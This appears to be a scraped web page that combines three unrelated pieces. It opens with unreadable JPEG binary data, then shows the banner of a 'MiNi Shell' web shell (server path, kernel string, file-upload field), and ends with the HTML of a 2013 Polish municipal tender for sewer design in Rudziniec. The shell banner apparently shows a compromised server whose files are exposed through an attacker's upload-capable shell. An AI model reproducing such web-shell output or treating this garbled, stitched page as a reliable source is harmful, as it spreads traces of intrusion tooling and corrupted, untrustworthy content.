JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/173194-N-2013.html

<p class="kh_header"><b>Rudziniec: Budowa kanalizacji sanitarnej w miejscowości Rudziniec</b><br>
<b>Numer ogłoszenia: 173194 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rudziniec , ul. Gliwicka 26, 44-160 Rudziniec, woj. śląskie, tel. 0324000 700, faks 032 4000 703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudziniec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w miejscowości Rudziniec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wraz z nadzorem autorskim dla zadania Budowa kanalizacji sanitarnej w miejscowości Rudziniec - opracowanie dokumentacji projektowej wraz z nadzorem autorskim 

1 Zakres rzeczowy zamówionej dokumentacji obejmuje:
1.1. Projekt/y budowlane w zakresie niezbędnym do uzyskania pozwolenia na budowę
1.2. Projekt/y wykonawcze wszystkich branż
1.3. Specyfikacje techniczne wykonania i odbioru robót
1.4. Przedmiary robót
1.5. Kosztorysy inwestorskie

2 Kanalizację należy zaprojektować jako kanalizację grawitacyjną z elementami kanalizacji tłocznej i przepompowniami ścieków w tych miejscach, gdzie rzeźba terenu nie pozwala na zastosowanie kanalizacji grawitacyjnej.

3 Sieć kanalizacyjną należy zaprojektować przede wszystkim z wykorzystaniem dróg i terenów gminnych a w następnej kolejności pozostałych rodzajów dróg i terenów.

4 Przy projektowaniu należy uwzględnić możliwość pokrycia siecią maksymalnego obszaru miejscowości w celu podłączenia jak największej ilości budynków do sieci.

5 Przy projektowaniu poszczególnych odcinków sieci kanalizacyjnej należy brać pod uwagę aspekty ekonomiczne tzn. koszt wykonania odcinka w korelacji z uzyskanymi efektami ekologicznymi i kosztami utrzymania sieci oraz kosztami oczyszczania 1 m3 ścieków dla eksploatatora i mieszkańca - o wykluczeniu danego obszaru miejscowości z projektu decyduje Zamawiający po przedstawieniu przez Wykonawcę analizy ekonomicznej dla danego obszaru.

6 Kosztorysowy koszt inwestycji nie może przekroczyć kwoty 16 500 000,00 zł netto, a koszt  oczyszczenia 1 m3 ścieków kwoty 10 zł netto

7 Projekt wykonawczy należy podzielić na etapy:
a) pierwszy etap - budowa rurociągu tłocznego/grawitacyjnego z miejscowości Rudziniec do miejsca włączenia się do kanalizacji w miejscowości Niezdrowice - studzienka kanalizacyjna przy ul. Wiejskiej - zgodnie z opracowaniem Koncepcja programowo - przestrzenna dla budowy kanalizacji sanitarnej w Rudzińcu(warunki podłączenia podane są przez Gminę Ujazd w piśmie nr 292/2012 z dnia 11.05.2012 r.) oraz wykonanie kanalizacji dla części miejscowości Rudziniec od nasypu kolejowego w kierunku północnym
b) kolejne etapy - skanalizowanie pozostałej części miejscowości Rudziniec z uwzględnieniem wysokości kosztów  budowy i możliwości finansowych budżetu gminy Rudziniec.
   
8 Zakres rzeczowy zamówienia obejmuje również wykonanie i uzyskanie wszystkich niezbędnych dokumentów i opracowań do zrealizowania zamówionej dokumentacji w tym:
8.1. Uzyskanie map prawnych i ich opracowanie dla celów projektowych
8.2. Inwentaryzację obiektów, zagospodarowania terenu
8.3. Inwentaryzację i waloryzację zieleni, jeżeli przewiduje się wycinkę drzew i krzewów lub oświadczenie o braku konieczności dokonywania wycinki
8.4. Opracowanie dokumentacji geologiczno - inżynierskiej jeżeli będzie wymagana
8.5. Opracowanie operatów ochrony środowiska i wodno - prawnych.

9 Wykonawca zobowiązany jest do uzyskania wszystkich niezbędnych uzgodnień branżowych w tym z dysponentami mediów w zakresie wynikającym ze specyfiki projektu i wszystkich pozostałych niezbędnych uzgodnień wynikających z przepisów prawa.

10 Przetarg obejmuje również pełnienie nadzoru autorskiego podczas realizacji inwestycji - maksymalnie 20 wizyt na budowie - stąd też w formularzu ofertowym należy podać koszt 1 wizyty na budowie i całkowity koszt nadzoru autorskiego. Płatność za każda wizytę potwierdzoną przez inspektora robót branżowych. O konieczności pobytu Wykonawcy na terenie budowy, w ramach pełnienia nadzoru autorskiego, decyduje Zamawiający.

11 Do obowiązków wykonawcy należy także:
11.1. Uzyskanie wszystkich dokumentacji, opinii i uzgodnień wymaganych przepisami prawa związanych z oddziaływaniem inwestycji na środowisko
11.2. Przygotowanie wniosków i niezbędnych dokumentów do uzyskania Decyzji o pozwolenie na budowę oraz  uzyskanie decyzji o pozwoleniu na budowę.
11.3. Reprezentowanie Zamawiającego przed właściwymi organami i instytucjami w celu uzyskania w/w decyzji (stosowne upoważnienia wykonawca otrzyma po podpisaniu umowy)
11.4. Uzyskanie sprawdzenia projektów
11.5. Złożenie oświadczenia o kompletności dokumentacji (oświadczenie, że dokumentacja została wykonana zgodnie z umową, obowiązującymi przepisami i normami oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć)
11.6. Uaktualnienie na żądanie Zamawiającego kosztorysu inwestorskiego. Żądanie Zamawiający może wnieść nie częściej niż co 180 dni kalendarzowych i nie później niż termin  udzielenia zamówienia publicznego na  realizację inwestycji
11.7. Udzielenie wyjaśnień do zapytań wykonawców robót budowlanych (w postępowaniu o zamówienie publiczne na ich wyłonienie) dotyczących zamówionej dokumentacji oraz wydania opinii na temat materiałów i urządzeń w przypadku zaproponowania przez wykonawcę robót budowlanych materiałów i urządzeń równoważnych. Wyjaśnień należy udzielić i ewentualne opinie przekazać niezwłocznie nie później niż w ciągu 36 godzin od otrzymania zapytania lub wniosku od Zamawiającego. Dla tego zakresu korespondencji między Zamawiającym a Wykonawcą dopuszcza się również formę elektroniczną (email).

12 Dokumentacja projektowa i wykonawcza powinna być wykonana zgodnie z obowiązującymi w tym zakresie prawem m.in.:
- Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.)
- Rozporządzeniem Ministra Transportu,Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Z 2012 r. poz. 462)
- Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. Z 2003 r. Nr 169 poz. 1650 z późn. zm.)
- Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Z 2002 r. Nr 75, poz. 690 wraz z późn zm.)
-  Ustawą Prawo budowlane z dnia 7 lipca 1994 r. (Dz. U. Z 2010 r. Nr 243, poz. 1623 z późn. zmianami)
- Ustawą Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. ( Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.)
- Rozporządzenie Ministra Środowiska z dnia 24 lipca 2006 r. w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz. U. Z 2006 r. Nr 137, poz. 984 z późn. zm.)
- Europejskich aprobat technicznych
- Norm międzynarodowych
- innych technicznych systemów odniesienia ustanowionych przez europejskie organy normalizacyjne
- Polskich Norm, aprobat technicznych. 

13 Projekty budowlane, wykonawcze, przedmiary robót, kosztorysy, specyfikacje techniczne wykonania i odbioru robót należy przygotować w wersji elektronicznej na nośniku CD - 1szt. 
- rysunki w ATOCAD i pdf, 
- kosztorys i przedmiary w NORMA PRO i pdf,
-  opis techniczny i specyfikacja techniczna w WORDzie i pdf 
oraz wersji papierowej ( wersja papierowa w 6 egz.). 

II.Informacje ogólne

1.W zakres zadania inwestycyjnego Budowa kanalizacji sanitarnej w miejscowości Rudziniec wchodzi:
- budowa lokalnej sieci kanalizacji sanitarnej
- budowa kolektora tłoczno - grawitacyjnego z miejscowości Rudziniec do miejscowości Niezdrowice w gminie Ujazd

2.Wieś Rudziniec położona jest w wschodniej części gminy Rudziniec na wysokości 190 - 219 m n.p.m. Zabudowa miejscowości  ma charakter zwarty i przylegający do drogi. Układ wysokościowy terenu powoduje, że część kanalizacji trzeba będzie zaprojektować na głębokości poniżej 2,0 m oraz dodatkowo przepompownie lokalne. 
- Łączna szacowana długość kanalizacji sanitarnej (sieć rozdzielcza, sieć tłoczna) około 16000 m
- Szacowana ilość przyłączy - ok. 412 szt.
- Równoważna liczba mieszkańców - ok.1 600 RLM

3.Szczegółowe sprawdzenie w terenie warunków wykonania umowy jest obowiązkiem Wykonawcy.

III.Założenia do projektowania:

1. Zamawiający nie narzuca Wykonawcy rozwiązań konstrukcyjnych i technologii 
wykonania zadania, lecz wnosi o uwzględnienie następujących elementów:
1.1. Kolektory grawitacyjne i rurociągi tłoczne z rur tworzywowych
1.2. Studnie węzłowe i rewizyjne o średnicy 1,0 m i 1,2 m, a dla zakończenia przykanalików studzienki o średnicy 425 mm
1.3. Przykanaliki o średnicy DN 150 mm z rur tworzywowych z wprowadzeniem na teren posesji zabudowanej zakończone studzienką w odległości max. 1,5 m od granicy działki.
1.4. Przykanaliki o średnicy DN 150 mm z rur tworzywowych zaślepione w granicy niezabudowanych działek.

2. Projekt budowlano - wykonawczy należy opracować uwzględniając warunki opisane w Koncepcji programowo-przestrzennej dla zadania inwestycyjnego pn. Budowa kanalizacji sanitarnej i oczyszczalni ścieków dla miejscowości Rudziniec. 

3. Przed złożeniem przez Wykonawcę wniosku o pozwolenie na budowę niezbędne będzie uzyskanie akceptacji od Zamawiającego rozwiązań projektowych zawartych w projekcie budowlanym - Zamawiający zastrzega sobie prawo do dokonania sprawdzenia projektu przez osoby trzecie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 usługi projektowe potwierdzającą wykonanie dokumentacji sieci kanalizacji sanitarnej o długości co najmniej 15 000mb, każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - zgodnie załącznikiem nr 5 do SIWZ. 

Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.

Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.

W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonania oceny spełniania warunków) niniejszego rozdziału SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność notarialnie.
Jeżeli Wykonawca, wykazując spełnianie warunków, opisanych w pkt. 2.2 do 2.4. niniejszego rozdziału SIWZ, polega na zasobach innych podmiotów na zasadach określonych powyżej w pkt. 4 (zgodnie z art. 26 ust. 2b ustawy), Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać:

dokumentów dotyczących w szczególności:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu;
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia; 
c) charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem;
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo zamówień publicznych.
2.Dopuszcza się możliwość dokonania  zmian postanowień umowy w stosunku do treści oferty jeżeli konieczność wprowadzania takich zmian wynika z następujących okoliczności:
2.1 Zmiany terminu realizacji przedmiotu umowy w następstwie:
a)siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej;
b) niezawinionych przez Wykonawcę działań organów administracji, (opóźnienia w uzyskaniu uzgodnień wymaganych przy realizacji przedmiotu umowy, opóźnienia w wydaniu Decyzji administracyjnych dotyczących przedmiotu umowy);
c) okoliczności leżących po stronie Zamawiającego i nie wynikających z winy Wykonawcy (np. wstrzymanie terminu realizacji przedmiotu umowy, zmiany przewidywanego okresu realizacji inwestycji, wstrzymanie, przerwa w realizacji inwestycji. 
Termin wykonania umowy ulega odpowiednio wydłużeniu o okres trwania tych okoliczności celem  dokończenia przedmiotu umowy w sposób należyty.
2.2  Zmiany wynagrodzenia, w następstwie ustawowej zmiany obowiązującej stawki podatku  VAT - stosownie do tej zmiany.
3. Nie stanowią zmiany umowy:
a) zmiana osób wyznaczonych do kontaktów, ze strony Zamawiającego, Wykonawcy (zmiana  może nastąpić poprzez pisemne zgłoszenie tego faktu drugiej stronie) 
b) zmiana danych związana z obsługą administracyjno-organizacyjną umowy, (np. danych teleadresowych Wykonawcy; Zamawiającego itp.). Zmiana może nastąpić poprzez pisemne zgłoszenie tego faktu drugiej stronie. 
c)  wydłużenie okresu gwarancji.
4. Wszelkie zmiany i uzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności - aneksu do umowy. 
5. Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudziniec.pl - BIP - Zamówienia publiczne powyżej 14 tyś. euro<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rudzińcu
ul. Gliwicka 26
44-160 Rudziniec
Pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 09:00, miejsce: Urząd Gminy w Rudzińcu:
ul. Gliwicka 26
44-160 Rudziniec
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie należy zrealizować w terminie:
a) dla dokumentacji projektowej od dnia zawarcia umowy do dnia 30.04.2014r. 
b) dla nadzoru autorskiego zgodnie z zapisami §5 wzoru umowy.
2. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania
3. Dowodami na potwierdzenie, że usługi zostały wykonane lub są wykonywane należycie są:
- poświadczenie, z tym, że do odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert
- oświadczenie wykonawcy, w przypadku jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa.
4. Dopuszcza się, aby Wykonawca w miejsce poświadczeń i oświadczeń, o których mowa powyżej przedłożył dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie (np. referencje), zgodnie z Rozporządzeniem Prezesa Rady Ministrów z 30.12.2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
5. W przypadku gdy Zamawiający, tj. Gmina Rudziniec jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których wyżej mowa.
6. W przypadku przedstawienia przez Wykonawcę, w celu wykazania spełniania warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
